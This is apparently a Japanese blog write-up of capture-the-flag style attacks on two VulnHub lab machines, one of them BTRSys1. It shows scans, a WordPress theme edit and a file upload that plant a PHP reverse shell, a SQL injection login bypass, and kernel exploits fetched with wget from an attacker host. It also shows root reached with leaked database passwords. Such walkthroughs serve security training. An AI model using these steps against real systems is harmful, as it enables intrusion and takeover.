http://10.10.10.13/upload/admins/admintools/ ==> DIRECTORY: http://10.10.10.13/upload/admins/groups/ + http://10.10.10.13/upload/admins/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/admins/interface/ ==> DIRECTORY: http://10.10.10.13/upload/admins/languages/ ==> DIRECTORY: http://10.10.10.13/upload/admins/login/ ==> DIRECTORY: http://10.10.10.13/upload/admins/logout/ ==> DIRECTORY: http://10.10.10.13/upload/admins/media/ ==> DIRECTORY: http://10.10.10.13/upload/admins/modules/ ==> DIRECTORY: http://10.10.10.13/upload/admins/pages/ ==> DIRECTORY: http://10.10.10.13/upload/admins/preferences/ ==> DIRECTORY: http://10.10.10.13/upload/admins/profiles/ ==> DIRECTORY: http://10.10.10.13/upload/admins/service/ ==> DIRECTORY: http://10.10.10.13/upload/admins/settings/ ==> DIRECTORY: http://10.10.10.13/upload/admins/start/ ==> DIRECTORY: http://10.10.10.13/upload/admins/support/ ==> DIRECTORY: http://10.10.10.13/upload/admins/templates/ ==> DIRECTORY: http://10.10.10.13/upload/admins/users/ ---- Entering directory: http://10.10.10.13/upload/framework/ ---- ==> DIRECTORY: http://10.10.10.13/upload/framework/functions/ + http://10.10.10.13/upload/framework/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/include/ ---- + http://10.10.10.13/upload/include/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/include/yui/ ---- Entering directory: http://10.10.10.13/upload/languages/ ---- + http://10.10.10.13/upload/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/media/ ---- + http://10.10.10.13/upload/media/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/ ---- + http://10.10.10.13/upload/modules/admin.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/modules/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/modules/news/ ==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/ ---- Entering directory: http://10.10.10.13/upload/page/ ---- + http://10.10.10.13/upload/page/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/page/posts/ ---- Entering directory: http://10.10.10.13/upload/search/ ---- + http://10.10.10.13/upload/search/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/temp/ ---- + http://10.10.10.13/upload/temp/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/temp/search/ ---- Entering directory: http://10.10.10.13/upload/templates/ ---- ==> DIRECTORY: http://10.10.10.13/upload/templates/blank/ + http://10.10.10.13/upload/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/ ---- + http://10.10.10.13/wordpress/wp-admin/admin.php (CODE:302|SIZE:0) ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/css/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/images/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/includes/ + http://10.10.10.13/wordpress/wp-admin/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/js/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/maint/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/network/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/user/ ---- Entering directory: http://10.10.10.13/wordpress/wp-content/ ---- + http://10.10.10.13/wordpress/wp-content/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/plugins/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/themes/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/upgrade/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/uploads/ ---- Entering directory: http://10.10.10.13/wordpress/wp-includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/upload/account/css/ ---- + http://10.10.10.13/upload/account/css/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/account/templates/ ---- + http://10.10.10.13/upload/account/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/access/ ---- + http://10.10.10.13/upload/admins/access/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/addons/ ---- + http://10.10.10.13/upload/admins/addons/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/admintools/ ---- + http://10.10.10.13/upload/admins/admintools/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/groups/ ---- + http://10.10.10.13/upload/admins/groups/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/interface/ ---- + http://10.10.10.13/upload/admins/interface/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/languages/ ---- + http://10.10.10.13/upload/admins/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/login/ ---- ==> DIRECTORY: http://10.10.10.13/upload/admins/login/forgot/ + http://10.10.10.13/upload/admins/login/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/logout/ ---- + http://10.10.10.13/upload/admins/logout/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/media/ ---- + http://10.10.10.13/upload/admins/media/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/modules/ ---- + http://10.10.10.13/upload/admins/modules/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/pages/ ---- + http://10.10.10.13/upload/admins/pages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/preferences/ ---- + http://10.10.10.13/upload/admins/preferences/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/profiles/ ---- + http://10.10.10.13/upload/admins/profiles/index.php (CODE:500|SIZE:0) ---- Entering directory: http://10.10.10.13/upload/admins/service/ ---- + http://10.10.10.13/upload/admins/service/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/settings/ ---- + http://10.10.10.13/upload/admins/settings/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/start/ ---- + http://10.10.10.13/upload/admins/start/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/support/ ---- + http://10.10.10.13/upload/admins/support/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/templates/ ---- + http://10.10.10.13/upload/admins/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/users/ ---- + http://10.10.10.13/upload/admins/users/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/framework/functions/ ---- + http://10.10.10.13/upload/framework/functions/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/include/yui/ ---- ==> DIRECTORY: http://10.10.10.13/upload/include/yui/event/ + http://10.10.10.13/upload/include/yui/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/include/yui/README (CODE:200|SIZE:8488) ==> DIRECTORY: http://10.10.10.13/upload/include/yui/yahoo/ ---- Entering directory: http://10.10.10.13/upload/modules/news/ ---- ==> DIRECTORY: http://10.10.10.13/upload/modules/news/css/ + http://10.10.10.13/upload/modules/news/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/modules/news/info.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/modules/news/languages/ ==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/ ---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/ ---- + http://10.10.10.13/upload/modules/wysiwyg/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/modules/wysiwyg/info.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/languages/ ==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/templates/ ---- Entering directory: http://10.10.10.13/upload/page/posts/ ---- + http://10.10.10.13/upload/page/posts/index.php (CODE:302|SIZE:0) ---- Entering directory: http://10.10.10.13/upload/temp/search/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/upload/templates/blank/ ---- + http://10.10.10.13/upload/templates/blank/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/templates/blank/info.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/network/ ---- + http://10.10.10.13/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0) + http://10.10.10.13/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/user/ ---- + http://10.10.10.13/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0) + http://10.10.10.13/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0) ---- Entering directory: http://10.10.10.13/wordpress/wp-content/plugins/ ---- + http://10.10.10.13/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://10.10.10.13/wordpress/wp-content/themes/ ---- + http://10.10.10.13/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0) ---- Entering directory: http://10.10.10.13/wordpress/wp-content/upgrade/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-content/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/upload/admins/login/forgot/ ---- + http://10.10.10.13/upload/admins/login/forgot/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/include/yui/event/ ---- + http://10.10.10.13/upload/include/yui/event/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/include/yui/event/README (CODE:200|SIZE:9807) ---- Entering directory: http://10.10.10.13/upload/include/yui/yahoo/ ---- + http://10.10.10.13/upload/include/yui/yahoo/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/include/yui/yahoo/README (CODE:200|SIZE:2889) ---- Entering directory: http://10.10.10.13/upload/modules/news/css/ ---- + http://10.10.10.13/upload/modules/news/css/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/news/languages/ ---- + http://10.10.10.13/upload/modules/news/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/news/templates/ ---- ==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/backend/ + http://10.10.10.13/upload/modules/news/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/languages/ ---- + http://10.10.10.13/upload/modules/wysiwyg/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/templates/ ---- + http://10.10.10.13/upload/modules/wysiwyg/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/news/templates/backend/ ---- + http://10.10.10.13/upload/modules/news/templates/backend/index.php (CODE:500|SIZE:67) ----------------- END_TIME: Mon May 11 07:34:12 2020 DOWNLOADED: 267496 - FOUND: 71
珍しく、情報量のとても多いdirb結果。
気になるディレクトリは主に「/upload/」と「/wordpress/」の二つ。
とりあえず、「/robots.txt」を確認する。
# curl 10.10.10.13/robots.txt Disallow: Hackers Allow: /wordpress/ .o+. :o/ -o+` /hh: shh` +hh- /hh: shh` -/: +hh- /hh: shh` +s+ +hh- /hh/............ `....shh-.... ...............` `-` `..............` +hh- .. /hhyyyyyyyyyyyyy/ `syyyyyhhyyyyy. -yyyyyyyyyyyyyyy/ oys +ssssssssssssss/ +hh- .+yy- /hh+---------/hh+ .----yhh:---- :hho------------` yhy` oyy------------` +hh- .+yys:` /hh: -hh+ shh` :hh+ yhy` oyy +hh- `.+yys/` /hh: -hh+ shh` :hh+ yhy` oss `-- +hhsssssyhy/` /hh: -hh+ shh` :hh+ yhy` `-. +yy. +hho+++osyy+. /hh: -hh+ shh` :hh+ yhy` +yy. +hh- `/syy+. /hho:::::::::+hh+ shh` :hh+ yhy` .::::::::::::oyy. +hh- `/yyy/` :yyyyyyyyyyyyyyy: +ys` .yy: oys +sssssssssssssss` /ys. `/sy- ``````````````` ` `` ` `````````````` ``
特に新たに得られた情報は無し。
改めてブラウザでホームページに接続してみると何か蠢いているgif
「/upload/」にアクセスすると、
Connection failed: SQLSTATE[HY000] [1049] Unknown database 'Lepton'
phpでmysqlの参照に失敗してる?
なんにしろこれ以上は「/upload/」にアクセスできない模様。
では、「/wordpress/」をチェック。
表示したページは本来のwordpressのデザインを読み込めていない?
Log in , admin
「Log in」があるので「admin/admin」でログイン試行。
あーログインできちゃったようなので、Appearance->Editorから簡単にアクセスできそうなphpを弄る。
お好みだけど、reverse-shellをsearch.phpにセットするのが分かりやすくて好き。
reverse-shellはいつもお世話になっているpentestmonkey産。
kaliならば、「/usr/share/webshells/php/php-reverse-shell.php」にある。
ここで、今回は「search.php」が動かなかったため(仕様?)、「comment.php」を改変してreverse-shellした。
window 1 # nc -nlvp 8080
firefoxから任意の記事にpostcommentする。
window 1 Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 14:43:02 up 1:24, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ whoami www-data $
shell getchu!
after shell getchu
kernel exploit
怪しいファイル全く見つからず、cron探しても目ぼしいものは無く。
仕方がないのでkernel exploit狙いでいく。
victim $ uname -a Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker # searchsploit ubuntu 4.4 ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- (snip) Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c (snip) Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
ささりそうな気がしたやつ。
「41458.c」を試す。
$ cd /tmp $ ls systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU $ wget 10.10.10.3/41458.c --2020-05-11 15:17:10-- http://10.10.10.3/41458.c Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 16554 (16K) [text/plain] Saving to: '41458.c' 0K .......... ...... 100% 46.3M=0s 2020-05-11 15:17:10 (46.3 MB/s) - '41458.c' saved [16554/16554] $ ls 41458.c systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU $ gcc 41458.c /bin/sh: 7: gcc: not found
えぇ、gcc無いんか。
コンパイル済みをダウンロードするか。
$ wget 10.10.10.3/a.out --2020-05-11 15:18:07-- http://10.10.10.3/a.out Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 23776 (23K) [application/octet-stream] Saving to: 'a.out' 0K .......... .......... ... 100% 68.2M=0s 2020-05-11 15:18:07 (68.2 MB/s) - 'a.out' saved [23776/23776] $ chmod 777 a.out $ ./a.out bash: cannot set terminal process group (1374): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu:/tmp# id id uid=0(root) gid=0(root) groups=0(root)
ちなみにこの後kernel panic起こした。
ttyでやっちゃったからかなぁ
「/usr/share/exploitdb/exploits/linux/local/44298.c」もroot取れた
こちらはkernel panic起こらず。
終わり
vulnhub BTRSys1 雑記
BTRSys1
サービス調査
# nmap -p- 10.10.10.12 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 06:59 EDT Nmap scan report for 10.10.10.12 Host is up (0.00031s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 18.49 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.12 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 07:01 EDT Nmap scan report for 10.10.10.12 Host is up (0.00049s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
気になりどころ
- [port 21] ftp vsftpd 3.0.2
- [port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.7 (Ubuntu)
詳細
[port 21] ftp vsftpd 3.0.2
# searchsploit vsftp ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
今後もvsfpdは殆ど刺さらなそう
[port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
OpenSSH < 6.6 SFTP (x64) - Command Execution | exploits/linux_x86-64/remote/45000.c OpenSSH < 6.6 SFTP - Command Execution | exploits/linux/remote/45001.py
何か刺さりそうな気がしたけど、SFTP無いし、sshのuserが分からん
[port 80] http Apache httpd 2.4.7 (Ubuntu)
# nikto -h 10.10.10.12 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.12 + Target Hostname: 10.10.10.12 + Target Port: 80 + Start Time: 2020-05-08 07:37:13 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.7 (Ubuntu) + Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /config.php: PHP Config file may contain database IDs and passwords. + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 7863 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-05-08 07:38:28 (GMT-4) (75 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.12 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat May 9 02:08:34 2020 URL_BASE: http://10.10.10.12/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.12/ ---- ==> DIRECTORY: http://10.10.10.12/assets/ + http://10.10.10.12/index.php (CODE:200|SIZE:758) ==> DIRECTORY: http://10.10.10.12/javascript/ + http://10.10.10.12/server-status (CODE:403|SIZE:291) ==> DIRECTORY: http://10.10.10.12/uploads/ ---- Entering directory: http://10.10.10.12/assets/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.12/javascript/ ---- ==> DIRECTORY: http://10.10.10.12/javascript/jquery/ ---- Entering directory: http://10.10.10.12/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.12/javascript/jquery/ ---- + http://10.10.10.12/javascript/jquery/jquery (CODE:200|SIZE:252879) + http://10.10.10.12/javascript/jquery/version (CODE:200|SIZE:5) ----------------- END_TIME: Sat May 9 02:08:51 2020 DOWNLOADED: 13836 - FOUND: 4
apacheやphp自体には特に何も無さそう。
色々ディレクトリはあるが目ぼしいものは無く
どう考えても「/uploads/」には怪しさしかないのだが。
config.phpは単純なアクセスじゃ見れない。
login.phpは適当にやっても通らなさそう。
しかし、
# curl 10.10.10.12/login.php (snip) <div class="login-box"> <div class="lb-header"> <a href="#" class="active" id="login-box-link">Giris Yap</a> </div> <form method="Post" name="loginform" action="personel.php" class="email-login"> <div class="u-form-group"> <input type="email" id="user" name="kullanici_adi" placeholder="Kullanici Adi" required/> </div> <div class="u-form-group"> <input type="password" id="pwd" name="parola" placeholder="Parola" required/> </div> <div class="u-form-group"> <input type="button" value="Giris" onclick="control();" /> </div> </form> </div> <script type="text/javascript"> function control(){ var user = document.getElementById("user").value; var pwd = document.getElementById("pwd").value; var str=user.substring(user.lastIndexOf("@")+1,user.length); if((pwd == "'")){ alert("Hack Denemesi !!!"); } else if (str!="btrisk.com"){ alert("Yanlis Kullanici Bilgisi Denemektesiniz"); } else{ document.loginform.submit(); } } </script>
パスワードにシングルクォーテーションが含まれていると拒否されて、
メールアドレスに「@btrisk.com」が含まれていないと許されないよう。
以上を満たせば、適当な値でログインできるぽい?
その遷移先ページは
# curl 10.10.10.12/personel.php (snip) <script type="text/javascript"> // accept=".jpg,.png" function getFile(){ var filename = document.getElementById("dosya").value; var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined); if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){ document.myform.submit(); }else{ //mesaj alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz."); return false; } } </script>
ファイルアップロードスクリプトがある?
スクリプトを動かす、ボタン等が見つからない。
改めて、login.phpへ戻る。
色々ログインを試していたら、「@btrisk.com」の前ならシングルクォーテーションを利用できる。
メールアドレスに「' or '1'='1'-- @btrisk.com」でSQLi通った模様。
SQLiが刺さればログインできたようで、getFile()のボタンを発見。
リバシェphpは、いつものpentestmonkeyのやつ「/usr/share/webshells/php/php-reverse-shell.php」
reverse-shellするphpファイルをアップロードしようとすると「jpg,gif,png」じゃないからダメと言われる。
しかし、画像ファイルじゃないとダメだという判断はjavascriptがサーバ側でなくクライアント側で行っているので、ブラウザのコンソールでgetFile()を弄ってやれば回避可能。
自分の場合、参照にファイルをセットした後、ブラウザのコンソールから「document.myform.submit();」を叩いてやることでuploadした。
さて、アップロードしたファイルはどこにアップロードされるのか。
それはやはり、「/uploads/」に決まっている。
実際、アップロード後に確認して見るとファイルが上がっている。
shell getchu!
window 1 # nc -nlvp 443
window 2 # curl 10.10.10.12/uploads/reverse.php
window 1 Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux 19:00:23 up 11:28, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
他に、「/javascript/」は「Forbidden」だったが、
「/javascript/jquery/jquery」と「/javascript/jquery/version」は何故か200である。
after shell getchu
sqlデータベースにある資格情報の利用
まずは、先ほど見れなかった「config.php」を見に行く。
$ python -c "import pty;pty.spawn('/bin/bash')" www-data@BTRsys1:/var/www/html$ cd /var/www/html/ cd /var/www/html/ www-data@BTRsys1:/var/www/html$ ls ls assets gonder.php index.php personel.php uploads config.php hakkimizda.php login.php sorgu.php www-data@BTRsys1:/var/www/html$ cat config.php cat config.php <?php ///////////////////////////////////////////////////////////////////////////////////////// $con=mysqli_connect("localhost","root","toor","deneme"); if (mysqli_connect_errno()) { echo "Mysql Bağlantı hatası!: " . mysqli_connect_error(); } ///////////////////////////////////////////////////////////////////////////////////////// ?> www-data@BTRsys1:/var/www/html$
まさかmysqlのroot起動によるのroot権限奪取か?
www-data@BTRsys1:/var/www/html$ mysql -u root -p mysql -u root -p Enter password: toor Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 361 Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu) Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> select sys_exec("id"); select sys_exec("id"); ERROR 1305 (42000): FUNCTION sys_exec does not exist
そんなことは無かったので色々見ていく。
mysql> show database; show database; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1 mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | deneme | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.00 sec) mysql> use information_schema; use information_schema; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +---------------------------------------+ | Tables_in_information_schema | +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | | INNODB_BUFFER_PAGE | | INNODB_TRX | | INNODB_BUFFER_POOL_STATS | | INNODB_LOCK_WAITS | | INNODB_CMPMEM | | INNODB_CMP | | INNODB_LOCKS | | INNODB_CMPMEM_RESET | | INNODB_CMP_RESET | | INNODB_BUFFER_PAGE_LRU | +---------------------------------------+ 40 rows in set (0.00 sec) mysql> use deneme; use deneme; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +------------------+ | Tables_in_deneme | +------------------+ | user | +------------------+ 1 row in set (0.00 sec) mysql> select * from user; select * from user; +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ | ID | Ad_Soyad | Kullanici_Adi | Parola | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi | +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ | 1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet | muhasebe | nazli | lokantaci | 5 | | 2 | can demir | cdmir@btrisk.com | asd123*** | mahmut | memur | gulsah | tuhafiyeci | 8 | +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ 2 rows in set (0.00 sec) mysql>
これは色々使えそうな情報では?
www-data@BTRsys1:/var/www/html$ su - su - Password: asd123*** root@BTRsys1:~# id id uid=0(root) gid=0(root) groups=0(root)
root shell getchu!!
cronを見た
「find / -perm -2 -type f 2>/dev/null」という面白いコマンドを見つけたので早速使って見る。
www-data@BTRsys1:/var/www/html$ find / -perm -2 -type f 2>/dev/null find / -perm -2 -type f 2>/dev/null /var/tmp/cleaner.py.swp /var/log/cronlog (snip) /lib/log/cleaner.py
結果は殆どどうでも良いが、面白いものを発見。
「/var/log/cronlog」,「/lib/log/cleaner.py」とは一体何なのだろうか。
www-data@BTRsys1:/var/www/html$ cat /var/log/cronlog cat /var/log/cronlog */2 * * * * cleaner.py www-data@BTRsys1:/var/www/html$ cat /lib/log/cleaner.py cat /lib/log/cleaner.py #!/usr/bin/env python import os import sys try: os.system('rm -r /tmp/* ') except: sys.exit() www-data@BTRsys1:/var/www/html$ ls -al /lib/log/ | grep cleaner ls -al /lib/log/ | grep cleaner -rwxrwxrwx 1 root root 96 Aug 13 2014 cleaner.py
